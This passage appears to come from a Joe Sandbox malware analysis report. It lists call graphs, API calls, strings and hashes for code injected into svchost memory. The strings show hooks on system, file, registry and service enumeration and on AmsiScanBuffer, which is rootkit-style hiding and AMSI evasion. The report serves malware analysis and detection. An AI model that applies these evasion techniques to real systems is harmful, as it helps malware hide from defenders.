15031 195de1ad1f4 __std_exception_copy 11 API calls 15030->15031 15031->15028 15037 195de1ac630 15032->15037 15049 195de1ac558 EnterCriticalSection 15037->15049 15051 195dd5c1bc4 15058 195dd5c1724 GetProcessHeap HeapAlloc 15051->15058 15053 195dd5c1bd3 15054 195dd5c1bda SleepEx 15053->15054 15057 195dd5c159c StrCmpIW StrCmpW 15053->15057 15109 195dd5c19b0 15053->15109 15055 195dd5c1724 50 API calls 15054->15055 15055->15053 15057->15053 15126 195dd5c1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15058->15126 15060 195dd5c174c 15127 195dd5c1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15060->15127 15062 195dd5c1754 15128 195dd5c1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15062->15128 15064 195dd5c175d 15129 195dd5c1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15064->15129 15066 195dd5c1766 15130 195dd5c1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15066->15130 15068 195dd5c176f 15131 195dd5c1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15068->15131 15070 195dd5c1778 15132 195dd5c1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15070->15132 15072 195dd5c1781 15133 195dd5c1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15072->15133 15074 195dd5c178a RegOpenKeyExW 15075 195dd5c19a2 15074->15075 15076 195dd5c17bc RegOpenKeyExW 15074->15076 15075->15053 15077 195dd5c17fb RegOpenKeyExW 15076->15077 15078 195dd5c17e5 15076->15078 15080 195dd5c181f 15077->15080 15081 195dd5c1836 RegOpenKeyExW 15077->15081 15134 195dd5c12b8 RegQueryInfoKeyW 15078->15134 15143 195dd5c104c RegQueryInfoKeyW 15080->15143 15084 195dd5c1871 RegOpenKeyExW 15081->15084 15085 195dd5c185a 15081->15085 15088 195dd5c18ac RegOpenKeyExW 15084->15088 15089 195dd5c1895 15084->15089 15087 195dd5c12b8 16 API calls 15085->15087 15090 195dd5c1867 RegCloseKey 15087->15090 15092 195dd5c18d0 15088->15092 15093 195dd5c18e7 RegOpenKeyExW 15088->15093 15091 195dd5c12b8 16 API calls 15089->15091 15090->15084 15097 195dd5c18a2 RegCloseKey 15091->15097 15094 195dd5c12b8 16 API calls 15092->15094 15095 195dd5c1922 RegOpenKeyExW 15093->15095 15096 195dd5c190b 15093->15096 15098 195dd5c18dd RegCloseKey 15094->15098 15100 195dd5c195d RegOpenKeyExW 15095->15100 15101 195dd5c1946 15095->15101 15099 195dd5c104c 6 API calls 15096->15099 15097->15088 15098->15093 15102 195dd5c1918 RegCloseKey 15099->15102 15104 195dd5c1981 15100->15104 15105 195dd5c1998 RegCloseKey 15100->15105 15103 195dd5c104c 6 API calls 15101->15103 15102->15095 15106 195dd5c1953 RegCloseKey 15103->15106 15107 195dd5c104c 6 API calls 15104->15107 15105->15075 15106->15100 15108 195dd5c198e RegCloseKey 15107->15108 15108->15105 15153 195dd5c14a0 15109->15153 15126->15060 15127->15062 15128->15064 15129->15066 15130->15068 15131->15070 15132->15072 15133->15074 15135 195dd5c1323 GetProcessHeap HeapAlloc 15134->15135 15136 195dd5c1486 RegCloseKey 15134->15136 15137 195dd5c1472 GetProcessHeap HeapFree 15135->15137 15138 195dd5c134e RegEnumValueW 15135->15138 15136->15077 15137->15136 15139 195dd5c13a1 15138->15139 15139->15137 15139->15138 15141 195dd5c13cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15139->15141 15142 195dd5c141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 15139->15142 15148 195dd5c1530 15139->15148 15141->15142 15142->15139 15144 195dd5c11b5 RegCloseKey 15143->15144 15146 195dd5c10bf 15143->15146 15144->15081 15145 195dd5c10cf RegEnumValueW 15145->15146 15146->15144 15146->15145 15147 195dd5c114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15146->15147 15147->15146 15149 195dd5c1580 15148->15149 15152 195dd5c154a 15148->15152 15149->15139 15150 195dd5c1561 StrCmpIW 15150->15152 15151 195dd5c1569 StrCmpW 15151->15152 15152->15149 15152->15150 15152->15151 15154 195dd5c14e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 15153->15154 15155 195dd5c14c2 GetProcessHeap HeapFree 15153->15155 15155->15154 15155->15155

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                                      • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                      • API String ID: 1735320900-4225371247
                                                                      • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                                      • Instruction ID: de7c7b0b1fa5c8bfd2a7283e6ad9184e658c645e80b04da55782a75e2e71bfbf
                                                                      • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                                      • Instruction Fuzzy Hash: 19519EB0511E4AA5EB12EFE8EC71BE433E3F744744F844523940AB6E75DE78829AD360

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProcSleep
                                                                      • String ID: AmsiScanBuffer$amsi.dll
                                                                      • API String ID: 188063004-3248079830
                                                                      • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                                      • Instruction ID: b2ba81ee3dff4456158bfad0c988b7334794b75317977c46b2f1466d5dc1a241
                                                                      • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                                      • Instruction Fuzzy Hash: DCD06730612E05D5EB0AAB95EC747E427E3ABA9B02FC40455C50BA1BA4DE6C85598360

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32 ref: 00000195DD5C3A35
                                                                      • PathFindFileNameW.SHLWAPI ref: 00000195DD5C3A44
                                                                        • Part of subcall function 00000195DD5C3F88: StrCmpNIW.KERNELBASE(?,?,?,00000195DD5C272F), ref: 00000195DD5C3FA0
                                                                        • Part of subcall function 00000195DD5C3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000195DD5C3A5B), ref: 00000195DD5C3EDB
                                                                        • Part of subcall function 00000195DD5C3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000195DD5C3A5B), ref: 00000195DD5C3F0E
                                                                        • Part of subcall function 00000195DD5C3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000195DD5C3A5B), ref: 00000195DD5C3F2E
                                                                        • Part of subcall function 00000195DD5C3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000195DD5C3A5B), ref: 00000195DD5C3F47
                                                                        • Part of subcall function 00000195DD5C3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000195DD5C3A5B), ref: 00000195DD5C3F68
                                                                      • CreateThread.KERNELBASE ref: 00000195DD5C3A8B
                                                                        • Part of subcall function 00000195DD5C1E74: GetCurrentThread.KERNEL32 ref: 00000195DD5C1E7F
                                                                        • Part of subcall function 00000195DD5C1E74: CreateThread.KERNELBASE ref: 00000195DD5C2043
                                                                        • Part of subcall function 00000195DD5C1E74: TlsAlloc.KERNEL32 ref: 00000195DD5C2049
                                                                        • Part of subcall function 00000195DD5C1E74: TlsAlloc.KERNEL32 ref: 00000195DD5C2055
                                                                        • Part of subcall function 00000195DD5C1E74: TlsAlloc.KERNEL32 ref: 00000195DD5C2061
                                                                        • Part of subcall function 00000195DD5C1E74: TlsAlloc.KERNEL32 ref: 00000195DD5C206D
                                                                        • Part of subcall function 00000195DD5C1E74: TlsAlloc.KERNEL32 ref: 00000195DD5C2079
                                                                        • Part of subcall function 00000195DD5C1E74: TlsAlloc.KERNEL32 ref: 00000195DD5C2085
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                                      • String ID:
                                                                      • API String ID: 2779030803-0
                                                                      • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                                      • Instruction ID: 1003c06aaf66b7c5c866787548ece578aa78949c06a5b7b0fc482ad27b2bcf41
                                                                      • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                                      • Instruction Fuzzy Hash: 2F115E31611F0D92FB62B7E8A9797ED23E3A758745F5041299406F1ED0EF7CC4648B50

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 54 195dd5c3f88-195dd5c3f93 55 195dd5c3fad-195dd5c3fb4 54->55 56 195dd5c3f95-195dd5c3fa8 StrCmpNIW 54->56 56->55 57 195dd5c3faa 56->57 57->55
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $nya-
                                                                      • API String ID: 0-1266920357
                                                                      • Opcode ID: 3efaac12778606dcc95ddaec52b91f85937fb41b3d0fc3d1e7fd65e0d6b9b78d
                                                                      • Instruction ID: 0e97dcb78fafe1989ea008382cd8497aa74b0bbef90c85fc47e837da8633626c
                                                                      • Opcode Fuzzy Hash: 3efaac12778606dcc95ddaec52b91f85937fb41b3d0fc3d1e7fd65e0d6b9b78d
                                                                      • Instruction Fuzzy Hash: 87D05E70322A0987FB169FE98CE06E063E2DB04744F484421D90051A00D758898EC720
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000003.2166828055.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_3_195dd590000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                      • Instruction ID: 81eb9ca1e145f9f3df9e1627e0e2b4308e684edaf148e2baa0fd21363b23cbcc
                                                                      • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                      • Instruction Fuzzy Hash: 64914872B01A50C7FB658F69D420BBDB3D2FB45B98F548124DE4927F98DA38D852CB00

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00000195DD5C1724: GetProcessHeap.KERNEL32 ref: 00000195DD5C172F
                                                                        • Part of subcall function 00000195DD5C1724: HeapAlloc.KERNEL32 ref: 00000195DD5C173E
                                                                        • Part of subcall function 00000195DD5C1724: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C17AE
                                                                        • Part of subcall function 00000195DD5C1724: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C17DB
                                                                        • Part of subcall function 00000195DD5C1724: RegCloseKey.ADVAPI32 ref: 00000195DD5C17F5
                                                                        • Part of subcall function 00000195DD5C1724: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1815
                                                                        • Part of subcall function 00000195DD5C1724: RegCloseKey.ADVAPI32 ref: 00000195DD5C1830
                                                                        • Part of subcall function 00000195DD5C1724: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1850
                                                                        • Part of subcall function 00000195DD5C1724: RegCloseKey.ADVAPI32 ref: 00000195DD5C186B
                                                                        • Part of subcall function 00000195DD5C1724: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C188B
                                                                        • Part of subcall function 00000195DD5C1724: RegCloseKey.ADVAPI32 ref: 00000195DD5C18A6
                                                                        • Part of subcall function 00000195DD5C1724: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C18C6
                                                                      • SleepEx.KERNELBASE ref: 00000195DD5C1BDF
                                                                        • Part of subcall function 00000195DD5C1724: RegCloseKey.ADVAPI32 ref: 00000195DD5C18E1
                                                                        • Part of subcall function 00000195DD5C1724: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1901
                                                                        • Part of subcall function 00000195DD5C1724: RegCloseKey.ADVAPI32 ref: 00000195DD5C191C
                                                                        • Part of subcall function 00000195DD5C1724: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C193C
                                                                        • Part of subcall function 00000195DD5C1724: RegCloseKey.ADVAPI32 ref: 00000195DD5C1957
                                                                        • Part of subcall function 00000195DD5C1724: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1977
                                                                        • Part of subcall function 00000195DD5C1724: RegCloseKey.ADVAPI32 ref: 00000195DD5C1992
                                                                        • Part of subcall function 00000195DD5C1724: RegCloseKey.ADVAPI32 ref: 00000195DD5C199C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                      • String ID:
                                                                      • API String ID: 948135145-0
                                                                      • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                                      • Instruction ID: bc7ff7d0a4b1cd314220cbc6919667ae0e82c12a0cd47d404db04aa3362832ec
                                                                      • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                                      • Instruction Fuzzy Hash: FF316275302E0981FB52ABABD570BE963E7EB44BD0F044421AE0EE7FD6DE24C8508754

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: AllocHeap
                                                                      • String ID:
                                                                      • API String ID: 4292702814-0
                                                                      • Opcode ID: 065a3c227d1033dd624f9406cc348b017554f0f94b7651207c823ad3d34cd8d2
                                                                      • Instruction ID: 793eeb1e93a05458d33e65646f3e43eb261e5313b62c9791bee9e1456550c0d1
                                                                      • Opcode Fuzzy Hash: 065a3c227d1033dd624f9406cc348b017554f0f94b7651207c823ad3d34cd8d2
                                                                      • Instruction Fuzzy Hash: 83F04930301F0481FF9797E158333F812D36BA9B48F095422990AA62C1ED2CE58AE310

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 437 195de1a2ff0-195de1a3069 439 195de1a306f-195de1a3075 437->439 440 195de1a3384-195de1a33a7 437->440 439->440 441 195de1a307b-195de1a307e 439->441 441->440 442 195de1a3084-195de1a3087 441->442 442->440 443 195de1a308d-195de1a309d GetModuleHandleA 442->443 444 195de1a309f-195de1a30af GetProcAddress 443->444 445 195de1a30b1 443->445 446 195de1a30b4-195de1a30d2 444->446 445->446 446->440 448 195de1a30d8-195de1a30f7 StrCmpNIW 446->448 448->440 449 195de1a30fd-195de1a3101 448->449 449->440 450 195de1a3107-195de1a3111 449->450 450->440 451 195de1a3117-195de1a311e 450->451 451->440 452 195de1a3124-195de1a3137 451->452 453 195de1a3147 452->453 454 195de1a3139-195de1a3145 452->454 455 195de1a314a-195de1a314e 453->455 454->455 456 195de1a3150-195de1a315c 455->456 457 195de1a315e 455->457 458 195de1a3161-195de1a316b 456->458 457->458 459 195de1a3251-195de1a3255 458->459 460 195de1a3171-195de1a3174 458->460 461 195de1a3376-195de1a337e 459->461 462 195de1a325b-195de1a325e 459->462 463 195de1a3186-195de1a3190 460->463 464 195de1a3176-195de1a3183 call 195de1a1a30 460->464 461->440 461->452 468 195de1a326f-195de1a3279 462->468 469 195de1a3260-195de1a326c call 195de1a1a30 462->469 466 195de1a31c4-195de1a31ce 463->466 467 195de1a3192-195de1a319f 463->467 464->463 472 195de1a31d0-195de1a31dd 466->472 473 195de1a31fe-195de1a3201 466->473 467->466 471 195de1a31a1-195de1a31ae 467->471 475 195de1a327b-195de1a3288 468->475 476 195de1a32a9-195de1a32ac 468->476 469->468 479 195de1a31b1-195de1a31b7 471->479 472->473 480 195de1a31df-195de1a31ec 472->480 482 195de1a320f-195de1a321c lstrlenW 473->482 483 195de1a3203-195de1a320d call 195de1a1cc4 473->483 475->476 484 195de1a328a-195de1a3297 475->484 477 195de1a32ae-195de1a32b7 call 195de1a1cc4 476->477 478 195de1a32b9-195de1a32c6 lstrlenW 476->478 477->478 495 195de1a32ee-195de1a32f9 477->495 491 195de1a32c8-195de1a32d7 call 195de1a1cfc 478->491 492 195de1a32d9-195de1a32e3 call 195de1a3f88 478->492 489 195de1a31bd-195de1a31c2 479->489 490 195de1a3247-195de1a324c 479->490 493 195de1a31ef-195de1a31f5 480->493 486 195de1a322f-195de1a3241 call 195de1a3f88 482->486 487 195de1a321e-195de1a322d call 195de1a1cfc 482->487 483->482 483->490 485 195de1a329a-195de1a32a0 484->485 485->495 496 195de1a32a2-195de1a32a7 485->496 486->490 500 195de1a32e6-195de1a32e8 486->500 487->486 487->490 489->466 489->479 490->500 491->492 491->495 492->500 493->490 503 195de1a31f7-195de1a31fc 493->503 509 195de1a3370-195de1a3374 495->509 510 195de1a32fb-195de1a32ff 495->510 496->476 496->485 500->461 500->495 503->473 503->493 509->461 511 195de1a3301-195de1a3305 510->511 512 195de1a3307-195de1a3321 call 195de1b3a40 510->512 511->512 513 195de1a3324-195de1a3327 511->513 512->513 516 195de1a3329-195de1a3347 call 195de1b3a40 513->516 517 195de1a334a-195de1a334d 513->517 516->517 517->509 519 195de1a334f-195de1a336d call 195de1b3a40 517->519 519->509
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                      • API String ID: 2119608203-3850299575
                                                                      • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                                      • Instruction ID: 8ebccfa928c62d8692154ca840ed037af18b33bd33b806d56abe3399b45f1b46
                                                                      • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                                      • Instruction Fuzzy Hash: 17B16A72314B9082EB6BCFE5D4227EDA3E6FB44B84F545016EE09A3794DE35E849E340

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 351 195dd5c2ff0-195dd5c3069 353 195dd5c3384-195dd5c33a7 351->353 354 195dd5c306f-195dd5c3075 351->354 354->353 355 195dd5c307b-195dd5c307e 354->355 355->353 356 195dd5c3084-195dd5c3087 355->356 356->353 357 195dd5c308d-195dd5c309d GetModuleHandleA 356->357 358 195dd5c30b1 357->358 359 195dd5c309f-195dd5c30af GetProcAddress 357->359 360 195dd5c30b4-195dd5c30d2 358->360 359->360 360->353 362 195dd5c30d8-195dd5c30f7 StrCmpNIW 360->362 362->353 363 195dd5c30fd-195dd5c3101 362->363 363->353 364 195dd5c3107-195dd5c3111 363->364 364->353 365 195dd5c3117-195dd5c311e 364->365 365->353 366 195dd5c3124-195dd5c3137 365->366 367 195dd5c3139-195dd5c3145 366->367 368 195dd5c3147 366->368 369 195dd5c314a-195dd5c314e 367->369 368->369 370 195dd5c315e 369->370 371 195dd5c3150-195dd5c315c 369->371 372 195dd5c3161-195dd5c316b 370->372 371->372 373 195dd5c3251-195dd5c3255 372->373 374 195dd5c3171-195dd5c3174 372->374 375 195dd5c325b-195dd5c325e 373->375 376 195dd5c3376-195dd5c337e 373->376 377 195dd5c3186-195dd5c3190 374->377 378 195dd5c3176-195dd5c3183 call 195dd5c1a30 374->378 381 195dd5c326f-195dd5c3279 375->381 382 195dd5c3260-195dd5c326c call 195dd5c1a30 375->382 376->353 376->366 379 195dd5c3192-195dd5c319f 377->379 380 195dd5c31c4-195dd5c31ce 377->380 378->377 379->380 385 195dd5c31a1-195dd5c31ae 379->385 386 195dd5c31fe-195dd5c3201 380->386 387 195dd5c31d0-195dd5c31dd 380->387 389 195dd5c32a9-195dd5c32ac 381->389 390 195dd5c327b-195dd5c3288 381->390 382->381 393 195dd5c31b1-195dd5c31b7 385->393 396 195dd5c3203-195dd5c320d call 195dd5c1cc4 386->396 397 195dd5c320f-195dd5c321c lstrlenW 386->397 387->386 394 195dd5c31df-195dd5c31ec 387->394 391 195dd5c32ae-195dd5c32b7 call 195dd5c1cc4 389->391 392 195dd5c32b9-195dd5c32c6 lstrlenW 389->392 390->389 398 195dd5c328a-195dd5c3297 390->398 391->392 410 195dd5c32ee-195dd5c32f9 391->410 404 195dd5c32d9-195dd5c32e3 call 195dd5c3f88 392->404 405 195dd5c32c8-195dd5c32d7 call 195dd5c1cfc 392->405 402 195dd5c31bd-195dd5c31c2 393->402 403 195dd5c3247-195dd5c324c 393->403 406 195dd5c31ef-195dd5c31f5 394->406 396->397 396->403 399 195dd5c321e-195dd5c322d call 195dd5c1cfc 397->399 400 195dd5c322f-195dd5c3241 call 195dd5c3f88 397->400 408 195dd5c329a-195dd5c32a0 398->408 399->400 399->403 400->403 414 195dd5c32e6-195dd5c32e8 400->414 402->380 402->393 403->414 404->414 405->404 405->410 406->403 417 195dd5c31f7-195dd5c31fc 406->417 409 195dd5c32a2-195dd5c32a7 408->409 408->410 409->389 409->408 423 195dd5c3370-195dd5c3374 410->423 424 195dd5c32fb-195dd5c32ff 410->424 414->376 414->410 417->386 417->406 423->376 425 195dd5c3301-195dd5c3305 424->425 426 195dd5c3307-195dd5c3321 call 195dd5d3a40 424->426 425->426 427 195dd5c3324-195dd5c3327 425->427 426->427 430 195dd5c3329-195dd5c3347 call 195dd5d3a40 427->430 431 195dd5c334a-195dd5c334d 427->431 430->431 431->423 433 195dd5c334f-195dd5c336d call 195dd5d3a40 431->433 433->423
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                      • API String ID: 2119608203-3850299575
                                                                      • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                                      • Instruction ID: 7baec0e749eea545dc07e13fd9085781a8f7b34d15abc23b24d43480ce1bb5d0
                                                                      • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
